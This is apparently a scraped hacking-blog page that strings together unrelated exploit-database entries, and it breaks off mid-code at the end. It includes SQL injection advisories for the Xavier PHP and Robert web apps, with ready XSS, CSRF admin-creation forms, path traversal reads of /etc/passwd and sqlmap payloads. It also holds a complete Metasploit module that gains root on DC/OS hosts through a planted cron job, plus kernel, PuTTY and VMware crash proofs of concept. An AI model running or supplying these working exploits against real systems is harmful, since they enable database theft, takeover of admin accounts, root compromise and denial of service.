Document Title:
===============
Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2076
Release Date:
=============
2017-06-06
Vulnerability Laboratory ID (VL-ID):
====================================
2076
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page.
You can also protect sections of pages. Secure your web pages or sections of content dependant on whether your users are logged in or out,
or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator.
(Copy of the Homepage: https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application.
Vulnerability Disclosure Timeline:
==================================
2017-06-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Siggles
Product: Xavier - PHP Login Script & User Management Admin Panel 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple sql-injection vulnerabilities has been discovered in the Xavier PHP Login Script & User Management Admin Panel web-application.
The issue allows remote attackers to inject own malicious sql commands to compromise the web-application & database management system.
The sql-injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuserdit.php` and `editgroup.php` files.
Remote attackers with privileged user accounts are able to compromise the web-application and database management system by injection of sql
commands via GET method request. The attacker vector is client-side and the request method to inject the sql commands is GET. The vulnerability
is a classic order by sql-injection.
The security risk of the sql-injection web vulnerability is estimated as medium with a common vulnerability scoring system count of 5.3.
Exploitation of the remote sql-injection web vulnerability requires an authenticated web-application user account and no user interaction.
Successful exploitation of the sql-injection web vulnerability results in web-application or database management system compromise.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] adminuseredit.php
[+] editgroup.php
Vulnerable Parameter(s):
[+] usertoedit
[+] log_id
Proof of Concept (PoC):
=======================
The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Example
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[SQL-INJECTION VULNERABILITY!]
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[SQL-INJECTION VULNERABILITY!]
PoC: Exploitation
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203--
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203--
--- SQL Error & Exception Logs ---
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]:
Column not found: 1054 Unknown column '100' in 'order clause''
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1'
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1'
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...')
#1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[SQL-INJECTION VULNERABILITY!]--
Mime Type[text/html]
Request Header:
Host[xavier-php.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache]
Keep-Alive[timeout=2, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
-
20:49:05.559[216ms][total 277ms] Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[SQL-INJECTION VULNERABILITY!]--
Mime Type[text/html]
Request Header:
Host[xavier-php.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache]
Keep-Alive[timeout=2, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
Reference(s):
https://xavier-php.localhost:8080/
https://xavier-php.localhost:8080/xavier/
https://xavier-php.localhost:8080/xavier/admin/
https://xavier-php.localhost:8080/xavier/admin/editgroup.php
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a parse via escape of the vulnerable parameters in the affected php files.
Restrict the prameter input and use a prepared statement to secure the functions of the admin panel.
Disallow to preview errors in the php code of the panel to prevent attacks.
Security Risk:
==============
The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863534408
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory
traversal & SQLi
# Date: 07/06/2017
# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
# Vendor website :http://robert.polosson.com/
# Download link : https://github.com/RobertManager/robert/archive/master.zip
# Live demo : http://robertdemo.polosson.com/
# Version: 0.5
# Tested on: Windows 7 x64 SP1 / Kali Linux
Web-application open-source management of equipment park for rental or loan.
Written in HTML, PHP, MySQL, CSS and Javascript.
Description : Multiple security issues have been found : XSS, CSRF,
Directory Traversal, SQLi
1- XSS reflected
http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E
param vuln : go
script vuln : index.php
2- XSS reflected
POST /robert/modals/personnel_list_techniciens.php
data :
searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom
param vuln : searchingfor
script vuln : personnel_list_techniciens.php
3- XSS Stored
POST /robert/fct/matos_actions.php
data:
action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
param vuln : label, ref et remarque
script vuln : matos_actions.php
4- XSS Stored
POST /robert/fct/packs_actions.php
data
:action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1}
param vuln : label, ref et remarque
script vuln : packs_actions.php
5- XSS stored
POST /robert/fct/beneficiaires_actions.php
action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic=
param vuln : surnom, prenom, nom
script vuln : beneficiaires_actions.php
6- XSS stored
POST /robert/fct/tekos_actions.php
action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
param vuln : label, type, adresse, ville, email, SIRET et remarque
script vuln : beneficiaires_actions.php
7- CSRF Create new admin
<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="create"/>
<input type="hidden" name="cMail" value="hacked@hacked.com"/>
<input type="hidden" name="cName" value="hacked"/>
<input type="hidden" name="cPren" value="hacked"/>
<input type="hidden" name="cPass" value="hacked"/>
<input type="hidden" name="cLevel" value="7"/>
<input type="hidden" name="cTekos" value="0"/>
<input type="submit" value="CSRFED This Shit"/>
</form>
8- CSRF Change admin password and infos
<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="modifOwnUser"/>
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="email" value="hacked"/>
<input type="hidden" name="nom" value="hacked"/>
<input type="hidden" name="prenom" value="hacked"/>
<input type="hidden" name="password" value="hacked"/>
<input type="submit" value="CSRFED This Shit"/>
</form>
9- Directory traversal on Download fonction ( Read Arbitrary File)
http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd
param vuln : file
script vuln : downloader.php
10- Directory traversal on Upload fonction (Upload file in root path)
POST
/robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg
HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
X-File-Name: filename.jpg
Content-Type: application/octet-stream
Referer: http://192.168.3.215/robert/index.php?go=gens
Content-Length: 99550
Cookie: YOURCOOKIE
Connection: close
...snip...
file data
...snip...
param vuln : folder
script vuln : uploader.php
11- Directory traversal on Delete fonction (Delete Arbitrary File)
POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 42
Cookie:YOURCOOKIE
Connection: close
action=supprFichier&idPlan=4&file=../../../../tested.txt
param vuln : file
script vuln : plans_actions.php
11- SQL Injection
POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 20
Cookie: YOURCOOKIE
Connection: close
action=loadPlan&ID=2'
POST parameter 'ID' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 397
HTTP(s) requests:
---
Parameter: ID (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
(NOT)
Payload: action=loadPlan&ID=2' OR NOT 8111=8111#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT
COUNT(*),CONCAT(0x7171787171,(SELECT
(ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: action=loadPlan&ID=2';SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN
---
param vuln : ID
script vuln : plans_actions.php
------------------------------------------------------------------------------------------------------------------------------
#### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit
SecTeam ####
------------------------------------------------------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'DC/OS Marathon UI Docker Exploit',
'Description' => %q{
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS cluster.
},
'Author' => 'Erik Daguerre',
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
],
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}
]
],
'DefaultOptions' => { 'WfsDelay' => 75 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 03, 2017'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
])
end
def get_apps
res = send_request_raw({
'method' => 'GET',
'uri' => target_uri.path
})
return unless res and res.code == 200
# verify it is marathon ui, and is returning content-type json
return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
apps = JSON.parse(res.body)
apps
end
def del_container(container_id)
res = send_request_raw({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, container_id)
})
return unless res and res.code == 200
res.code
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
payload_data = nil
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
command << "echo \"\" >> #{echo_cron_path}\n"
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
command << "sleep 120"
command
end
def make_container(mnt_path, cron_path, payload_path, container_id)
vprint_status('Setting container json request variables')
container_data = {
'cmd' => make_cmd(mnt_path, cron_path, payload_path),
'cpus' => 1,
'mem' => 128,
'disk' => 0,
'instances' => 1,
'id' => container_id,
'container' => {
'docker' => {
'image' => datastore['DOCKERIMAGE'],
'network' => 'HOST',
},
'type' => 'DOCKER',
'volumes' => [
{
'hostPath' => '/',
'containerPath' => mnt_path,
'mode' => 'RW'
}
],
},
'env' => {},
'labels' => {}
}
container_data
end
def check
return Exploit::CheckCode::Safe if get_apps.nil?
Exploit::CheckCode::Appears
end
def exploit
if get_apps.nil?
fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id()
res = send_request_raw({
'method' => 'POST',
'uri' => target_uri.path,
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
})
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
print_status('The docker container is created, waiting for it to deploy')
register_files_for_cleanup(cron_path, payload_path)
sleep_time = 5
wait_time = datastore['WAIT_TIMEOUT']
deleted_container = false
print_status("Waiting up to #{wait_time} seconds for docker container to start")
while wait_time > 0
sleep(sleep_time)
wait_time -= sleep_time
apps_status = get_apps
fail_with(Failure::Unknown, 'No apps returned') unless apps_status
apps_status['apps'].each do |app|
next if app['id'] != "/#{container_id}"
if app['tasksRunning'] == 1
print_status('The docker container is running, removing it')
del_container(container_id)
deleted_container = true
wait_time = 0
else
vprint_status('The docker container is not yet running')
end
break
end
end
# If the docker container does not deploy remove it and fail out.
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to start")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end
// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
static int sockfd = 0;
static struct sockaddr_in addr = {0};
void fuzz(void * param){
while(1){
addr.sin_family = 0;//rand()%42;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16);
}
}
int main(int argc, char **argv)
{
sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
int thrd;
pthread_create(&thrd, NULL, fuzz, NULL);
while(1){
addr.sin_family = 0x1a;//rand()%42;
addr.sin_port = 0;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(sockfd, (struct sockaddr *)&addr, 16);
addr.sin_family = 0;
}
return 0;
}
/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:
gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472
(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>
int main()
{
for (;;)
keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}
Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html
summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections
class: vulnerability: This is a security vulnerability.
difficulty: fun: Just needs tuits, and not many of them.
priority: high: This should be fixed in the next release.
present-in: 0.67
fixed-in: 4ff22863d895cb7ebfced4cf923a012a614adaa8 (0.68)
Many versions of PuTTY prior to 0.68 have a heap-corrupting integer overflow bug in the ssh_agent_channel_data function which processes messages sent by remote SSH clients to a forwarded agent connection.
The agent protocol begins every message with a 32-bit length field, which gives the length of the remainder of the message, not including the length field itself. In order to accumulate the entire message including the length field in an internal buffer, PuTTY added 4 to the received length value, to obtain the message length inclusive of everything. This addition was unfortunately missing a check for unsigned integer overflow.
Hence, sending a length field large enough to overflow when 4 is added to it, such as 0xFFFFFFFD, would cause PuTTY to record a value for the total message length (totallen) which was smaller than the amount of data it had already seen (lensofar, which at this point would be 4 bytes for the length field itself). Then, it would assume that the expression totallen-lensofar represented the amount of space it was safe to write into its buffer – but in fact, in the overflowing case, this value would wrap back round to a number just less than 232, far larger than the allocated heap block, and PuTTY could be induced to overwrite its heap with data sent by the attacker.
If your server is running Linux or any reasonably similar Unix, and has the socat network utility installed, then you can use this simple proof of concept to determine whether you are affected. Simply run the shell command
(echo -ne '\xFF\xFF\xFF\xFD\x0B'; cat /dev/zero) | socat stdio unix-connect:$SSH_AUTH_SOCK
and PuTTY will crash.
This bug is only exploitable at all if you have enabled SSH agent forwarding, which is turned off by default. Moreover, an attacker able to exploit this bug would have to have already be able to connect to the Unix-domain socket representing the forwarded agent connection. Since any attacker with that capability would necessarily already be able to generate signatures with your agent's stored private keys, you should in normal circumstances be defended against this vulnerability by the same precautions you and your operating system were already taking to prevent untrusted people from accessing your SSH agent.
This vulnerability was reported by Tim Kosse, and has been assigned CVE ID CVE-2017-6542.
Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500
POC to trigger null pointer dereference (mutool)
After some fuzz testing I found a crashing test case.
Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642
To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null
ASAN:
==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
==1406==The signal is caused by a READ memory access.
==1406==Hint: address points to the zero page.
#0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
#1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
#2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
#3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
#4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
#5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
#6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
#7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
#8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
#9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
#10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
#11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
#12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
#13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
#14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
#15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
#16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
#17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
#18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
#19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
#20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
==1406==ABORTING
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42138.zip
Source: http://seclists.org/oss-sec/2017/q1/458
Description:
Mujstest, which is part of mupdf is a scriptable tester for mupdf + js.
A crafted image posted early for another issue, causes a stack overflow.
The complete ASan output:
# mujstest $FILE
==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
WRITE of size 1453 at 0x7fff29560b00 thread T0
#0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-
r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
#1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
source/platform/x11/jstest_main.c:358:7
#2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-
r3/work/glibc-2.23/csu/../csu/libc-start.c:289
#3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)
Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in
frame
#0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
source/platform/x11/jstest_main.c:293
This frame has 7 object(s):
[32, 1056) 'path'
[1184, 2208) 'text' <== Memory access at offset 1056 partially underflows
this variable
[2336, 2340) 'w' <== Memory access at offset 1056 partially underflows
this variable
[2352, 2356) 'h' <== Memory access at offset 1056 partially underflows
this variable
[2368, 2372) 'x' <== Memory access at offset 1056 partially underflows
this variable
[2384, 2388) 'y' <== Memory access at offset 1056 partially underflows
this variable
[2400, 2404) 'b' 0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
f2 f2
0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32127==ABORTING
Affected version:
1.10a
Fixed version:
N/A
Commit fix:
N/A
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-6060
Reproducer:
https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main
Timeline:
2017-02-05: bug discovered and reported to upstream
2017-02-17: blog post about the issue
2017-02-17: CVE assigned via cveform.mitre.org
Note:
This bug was found with Address Sanitizer.
Permalink:
https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42139.zip
/*
* Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)
* CVE: 2017-4916 (VMSA-2017-0009)
* Author: Borja Merino (@BorjaMerino)
* Date: May 18, 2017
* Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)
* Affected: VMware Workstation Pro/Player 12.x
* Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device
* driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)
*/
#include "windows.h"
#include "stdio.h"
void ioctl_crash()
{
HANDLE hfile;
WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
